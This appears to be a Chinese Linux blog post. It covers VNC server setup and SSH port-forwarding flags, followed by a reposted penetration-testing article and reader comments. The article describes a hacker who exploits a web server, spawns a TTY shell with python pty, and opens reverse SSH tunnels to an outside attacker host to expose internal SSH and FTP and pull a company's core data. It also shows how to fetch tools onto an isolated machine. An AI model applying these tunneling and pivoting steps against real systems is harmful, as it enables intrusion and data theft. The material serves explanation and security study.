Chinaunix首页 | 论坛 | 博客
  • 博客访问: 324646
  • 博文数量: 120
  • 博客积分: 3000
  • 博客等级: 中校
  • 技术积分: 1290
  • 用 户 组: 普通用户
  • 注册时间: 2009-12-19 01:46
文章分类

全部博文(120)

文章存档

2010年(84)

2009年(36)

我的朋友

分类: LINUX

2009-12-28 15:11:01

1.安装vnc-server  vncviewer
2.执行vncserver  输入密码
3.执行vncserver -kill :1 杀死1号屏幕
4.修改/root/.vnc/xstartup
   unset SESSION_MANAGER
   exec /etc/X11/xinit/xinitrc
  去掉以上两行的注释
 或者:
/root/.vnc/xstartup,在最后一行会看到twm &,(不能去掉&)如果要运行KDE则将twm改成
startkde
Gnome则改成
gnome-session

5.x0vncserver PasswordFile=/root/.vnc/passwd
  此命令意思是将本地桌面共享出去,且为:0
6.在客户端运行如下命令即可连接
  vncviewer --shared --viewonly 192.168.5.66:0
  --shared 无此参数则一个桌面只能连一个客户端
  --viewonly 否则客户端可操作服务端系统
7.chkconfig vncserver on
8.ehco "vncserver :1" >>/etc/rc.local
  这样就可每次启动时自动激活:1

以SSH连接远端机器:
   vncviewer -via user@192.168.5.66 localhost:1
或 vncviewer -via user@192.168.5.66 localhost::5091

以转发端口的形式连接远端机器:
              (本地端口,可任意)    (远程端口)
ssh -L (localhost:)5901:localhost:5091 user@192.168.5.66输入密码
然后在另一终端输入 vncviewer localhost:1  或 vncviewer localhost:5091

#配置文件
#vi /etc/sysconfig/vncservers         
--添加以下几行,保存并退出,前提:存在3个用户:root, oracle, rrosen
VNCSERVERS="1:root 2:lym 3:oracle"
VNCSERVERS="1:root 2:lym 3:oracle"
VNCSERVERARGS[1]="-geometry 1024x768 -alwayssha -depth 24"
VNCSERVERARGS[2]="-geometry 1024x768 -alwayssha -depth 24"
VNCSERVERARGS[3]="-geometry 1024x768 -alwayssha -depth 24"

# 其中,参数alwayssha设 置为同时可有多个用户访问服务端,
# 这样,就不担心你登录到服务端后被其他用户挤下来(且在vncviewer端不用再设置“共享连接”)
# 当然,若要安全起见,这个参数也可以不要。
--保存退出,然后重新启动vncserver

-------------------------------------------------------------------------
vncviewer 192.168.5.67:1 --passwd=/root/.vnc/host67pswd
此host67pswd为vncserver上的密码文件,是COPY过来的,这样每次想登录是,可以免去输入密码的过程
(创建一个启动器)

_____________________________________________________________________

以下部分来自网络:(出处不祥)

_______________________________________________________________________

linux端口映射

   ssh -C -g root@127.0.0.1 -L 5000:61.235.139.123:5000
输入机器的root密码
后台执行:ssh -C -f -N -g root@127.0.0.1 -L 5000:61.235.139.123:5000
另:
ssh -C -f -N -g -R remote_port:local:port user@remotehost
可 以将远端服务器一个端口remote_port绑定到本地端口port,其中-C是进行数据压缩,-f是后台操作,只有当提示用户名密码的时候才转向前 台。-N是不执行远端命令,在只是端口转发时这条命令很有用处。-g 是允许远端主机连接本地转发端口。-R表明是将远端主机端口映射到本地端口。如果是-L,则是将本地端口映射到远端主机端口。


关于ssh端口转发的深入实例

ssh的三个强大的端口转发命令:
ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host


----------------------------------------------------------------------------

author: ring04h[EST]

在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。
由于时间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空在加上。

SSH的三个端口转发命令:
ssh -C -f -N -g -L listen_port:DST_Host:DST_port
ssh -C -f -N -g -R listen_port:DST_Host:DST_port
ssh -C -f -N -g -D listen_port

-f Fork into background after authentication.
后台认证用户/密码,通常和-N连用,不用登录到远程主机。

-p port Connect to this port. Server must be on the same port.
被登录的ssd服务器的sshd服务端口。

-L port:host:hostport
将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-R port:host:hostport
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

-D port
指定一个本地机器 “动态的'’ 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS4 协议, 将充当 SOCKS4 服务器. 只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发.

-C Enable compression.
压缩数据传输。

-N Do not execute a shell or command.
不执行脚本或命令,通常与-f连用。

-g Allow remote hosts to connect to forwarded ports.
在-L/-R/-D参数中,允许远程主机连接到建立的转发的端口,如果不加这个参数,只允许本地主机建立连接。注:这个参数我在实践中似乎始终不起作用)

如果想要了解更多关于SSH的细节,可以 man ssh ,或参照ssh的DOC.

实例:
------------------------------------------------------------------------------
当骇客A从互联网入侵了RISUN企业的一台服务器,机器名称为 GBOSS_WEB
GBOSS_WEB 信息:
外网IP:255.25.55.111
内网IP:10.168.0.10
网络架构方式为,路由将外网256.25.56.111的80端口映射到内网10.168.0.10的80端口上。

骇客A通过利用80端口开放服务的WEB脚本漏洞,成功继承到GBOSS_WEB的httpd权限,然后通过perl或者其它语言创建SOCKET 获得一个远程sh shell。由于back回来的shell可能不稳定,或者使用起来不方便,可以采用SSH建立一个隧道,将GBOSS_WEB服务器上的22端口映射至 骇客的本机上(本文章用于演示的骇客机为0x.cn);

通过得到的sh shell,执行 $python -c 'import pty; pty.spawn("/bin/sh")' 获得一个ttyshell(因为ssh想要tty的支持),然后通过如下命令,映射GBOSS_WEB服务器的22端口至202.65.208.142的 44端口;
$ssh -C -f -N -g -R 44:127.0.0.1:22
这样登录0x.cn的ssh服务,ssh -p 44 127.0.0.1 等同于连接GBOSS_WEB的22端口。

骇客A通过利用操作系统系统提升权限至ROOT,再继续渗透过程中,发现内网还存在另外一台名称为GBOSS_APP的服务器。
GBOSS_APP 信息:
内网IP:10.168.0.20

骇客通过嗅探获取了GBOSS_APP服务器的FTP信息,GBOSS_APP服务器FTP保存有RISUN企业的核心数据,由于数据量庞大,需要FTP续传功能,可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口;
$ssh -C -f -N -g -R 2121:10.168.0.20:21

当骇客成功root掉内网中另一网段中的服务器BILL_APP时,需要从外网下载一些工具,由于内部访问控制策略,BILL_APP无法连接网, 此时可以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口,然后通过GBOSS_WEB建立的隧道,下载所需工具。
在GBOSS_WEB服务器上执行:
$ssh -C -f -N -g -L 8888:202.65.208.142:80

通过建立隧道后,在BILL_APP上执行 wget 等同于访问

本文详细的概述了如何建立隧道的过程,以及相关参数的使用方法,各位懂的高手可以直接飘过。
本文中骇客所使用的地址为真实IP,对应域名: 欢迎无聊的骇客们破坏。(SSH有个隐藏的密码,很容易的...)


这里有错误指正一下
如果没有拿到root的话应该是ssh -p 44
你的ssh -p 44 127.0.0.1默认是以root连接的
除非你有root密码的说

楼上正解鸟

回复cnbird:
作者在前边已经说了已经通过服务器的漏洞得到了rootshell。
所以下边的也就成立了,只是做了端口映射将服务器的端口映射到本机上。


直接把lcx 或 NC 的C源码拿到目标机器上用GCC 编译下也是一种方法...

回复cnbird:这样登录0x.cn的ssh服务,ssh -p 44 127.0.0.1 等同于连接GBOSS_WEB的22端口楼主说得很清楚了,ssh -p 127.0.0.1等同于连接GBOSS_WEB的22端口连接的用户取决于你连0x.cn的用户,这些细节谁都了解,只是博主没写得那么细浪费文章篇幅 吧?


有几个人又装B了,博主明明说是通过漏洞获得httpd权限,然后才提权得到了root权限。



----------------------------------------------------------------
#ssh -X user@host "commond" (这个可在本地打开远端的图形化界面)
或者:
#ssh -X user@host
#commond


阅读(1460) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~